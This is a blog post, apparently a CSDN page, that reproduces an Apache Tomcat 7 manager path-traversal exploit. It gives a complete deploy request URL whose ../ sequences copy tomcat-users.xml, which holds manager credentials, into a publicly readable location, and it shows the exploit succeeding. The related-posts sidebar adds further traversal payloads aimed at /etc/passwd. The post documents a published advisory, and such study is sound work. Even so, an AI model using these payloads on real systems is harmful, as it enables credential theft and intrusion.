Exploit - Apache Tomcat Directory/Path Traversal

最新推荐文章于 2023-09-07 22:26:34 发布
最新推荐文章于 2023-09-07 22:26:34 发布
阅读量2.3k 收藏
点赞数
分类专栏: exploit

Apache Tomcat Directory/Path Traversal

http://localhost:8080/manager/text/deploy?path=/foo&config=D:/TESTING/Java/run/apache-tomcat-7.0.76/conf/tomcat-users.xml&war=1&version=/../../../../webapps/manager/users

Previous URL would copy file named D:/TESTING/Java/run/apache-tomcat- 7.0.76/conf/tomcat-users.xml to destination folder http://localhost/manager/ under the name of users. As we’ve seen in previous code snippets, .xml extension will be added to each file that is copied.
Following image contains browser requesting target URL directly and application response in that case

exploit

As we can see from the previous image, application response is “FAIL - Failed to deploy application at context path /foo##/../../../../webapps/manager/users”, but file is copied anyway.
We can confirm that with direct request for users.xml file in webroot of manager application - http://localhost:8080/manager/users.xml .

exploit successfully

References

http://www.defensecode.com/advisories/DC-2017-03-001_DefenseCode_ThunderScan_SAST_Apache_Tomcat_Security_Advisory.pdf

Nixawk
关注
专栏目录
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 1611
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
红队系列-网络安全知识锦囊(持续更新)
最新发布
aming小老弟
11-09 1218
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
tomcat7.02版本,保证可用
03-11
tomcat的7.02版本,保证可用。楼主用着挺好的。谢谢大家。
Apache Tomcat v.5.5.26 Directory Traversal
cnbird's blog
01-30 1650
http://127.0.0.1:7021/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
tomcat RequestDispatcher directory traversal vulnerability
cnbird's blog
01-16 907
CVE-2008-5515: Apache Tomcat information disclosure vulnerability Severity: Important Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.1.0 to 4.1.39 Tomcat 5.5.0 to 5.5.2
apache-httpd_2.4.49_path-traversal_CVE-2021-41773
acdcccc的博客
09-07 192
Apache httpd 2.4.49 路径穿越漏洞
python脚本验证Apache Tomcat Examples Directory Vulnerabilities
lirunling的博客
09-28 4751
本人最近在做项目实训,在用AWVS扫描的时候遇到了Apache Tomcat Examples Directory Vulnerabilities漏洞。那么问题来了,如何利用python脚本验证此漏洞,话不多说,直接上代码(python3.6.0上亲测有效),此代码参考了网上别人写的部分代码 #!/usr/bin/env python import urllib.request
kali渗透学习-弱点扫描(未完成,安装原因空闲时候再来安装)
weixin_43239236的博客
01-23 243
发现漏洞 国际上漏洞机构 SCAP (Security Content Automation Protocol) SCAP是一个集合了多种公开的安全标准的框架,这些公开的安全标准被称为SCAP Element,SCAP版本1.0包含六个Element:XCCDF、OVAL、CVE、CCE、CPE、CVSS。SCAP包含了Protocol与Content,Protocol规范了Element之间如何协同工作,Content指按照Protocol的约定,利用Element描述的生成应用于实际检查工作的数据,其实
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5558
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
Web中间件常见安全漏洞
KHOST的博客
03-19 8411
第一章:IIS IIS 6 解析漏洞 IIS 7 解析漏洞 PUT任意文件写入 IIS短文件漏洞 HTTP.SYS远程代码执行 (MS15-034) RCE-CVE-2017-7269 第二章:Apache 未知扩展名解析漏洞 AddHandler导致的解析漏洞 ...
path-traversal-servlet:演示目录遍历的简单 Servlet
06-26
路径遍历servlet 演示目录遍历的简单 Servlet 运行应用程序 mvn tomcat7:run 到试试
网站安全(13) ——目录穿越漏洞(Directory Traversal)
weixin_30301183的博客
05-26 1821
如果应用程序使用用户可控制的数据,以危险的方式访问位于应用服务器或其它后端文件系统的文件或目录,就会出现路径遍历。 攻击者可以将路径遍历序列放入文件名内,向上回溯,从而访问服务器上的任何文件,路径遍历序列叫“点-点-斜线”(..\) http://***/go.action?file=..\..\etc\passwd 避开过滤第一种是过滤文件名参数中是否存在任何路径遍历序列(..\)如...
Tomcat5.5的一个问题
阿杰的博客
07-25 259
第一天来公司上班的时候,竟然被配置WEB程序的问题搞了半天。郁闷至极。 上班也有一年了,连个基础的东西都搞不定,难怪被本人鄙视 在tomcat的/conf/server.xml中配置连接池。 插入以下代码 factory org.apache.commons.dbcp.BasicDataSourceF...
Tomcat 样例目录暴露(低危)
打代码的小女孩
06-06 1万+
Apache Tomcat样例目录session操纵漏洞 0x00 背景 前段时间扫到的漏洞,研究了下,感觉挺有意思的,发出来和大家分享下,有啥不对的地方还请各位拍砖指正。 Apache Tomcat默认安装包含”/examples”目录,里面存着众多的样例,其中session样例(/examples/servlets/servlet/SessionExample)允许用户对sess...
反向代理映射实现Tomcat目录遍历
voctor2436的博客
05-08 2519
反向代理映射实现Tomcat目录遍历
apache目录遍历漏洞利用_Apache Tomcat UTF8目录遍历漏洞测试代码
weixin_39618824的博客
12-24 627
/*Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploitc0d3r: mywisdomthanks for not being lame to change exploit authortis is one of my linux w0rm module for user e...
基于tomcat的反向代理服务
Bobo-Smile-Always
05-24 2495
同学们在开发web应用的过程中,为了测试方便,通常会将部分公网入口流量切入到内网的开发机器上。或许你会用什么向日葵做一个私有域名以便从远程访问开发中程序,但是此域名带宽甚小或者需要付费;而你本地若是windows开发电脑,则SSH等做代理经常断开,不是很方便。此文为你引入一个web应用,极其方便的部署到tomcat中即可实现,将公网上的流量引入到私网的开发电脑上,实现断点调试等功能。 1,前提:你们公司有一台云服务器,或者具有公网IP,所有公网入口流量从此服务器进入。 2,大多数公网服务器会运行toma
路径穿越(Path Traversal)详解
热门推荐
12-06 1万+
本文主要是对路径穿越漏洞进行学习总结,本身这个漏洞也并不常见,主要是多产生于php的程序。这种类型的攻击强制访问文件、目录、 以及位于 Web 文档根目录之外的命令 或 CGI 根目录。常用来其他读取、写入类漏洞结合。我个人给这种漏洞形成的原因可以分为两类 错误配置由于带有中间代理转发性质的功能配置错误程序本身代码存在问题这一点十分好理解,就是代码写的有问题,逻辑简单,没有验证。第一类:文件类参数请求参数似乎包含文件或目录名称的,例如include=main.inc或template=/en/sidebar
【常见Web应用安全问题】---4、Directory traversal
weixin_34331102的博客
12-22 337
Web应用程序的安全性问题依其存在的形势划分,种类繁多,这里不准备介绍所有的,只介绍常见的一些。  常见Web应用安全问题安全性问题的列表:   1、跨站脚本攻击(CSS or XSS, Cross Site Scripting)   2、SQL注入攻击(SQL injection)   3、远程命令执行(Code execution,个人觉得译成代码执行并不确...
https://docs.metasploit.com/docs/development/developing-modules/libraries/http/how-to-write-a-browser-exploit-using-browserexploitserver.html
06-12
这是一个关于开发Metasploit模块的文档,具体来说是使用BrowserExploitServer(BES)编写浏览器漏洞利用模块。 BES是Metasploit框架中的一个组件,它可以用于利用浏览器漏洞,其中包括了一些javascript代码,能够在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值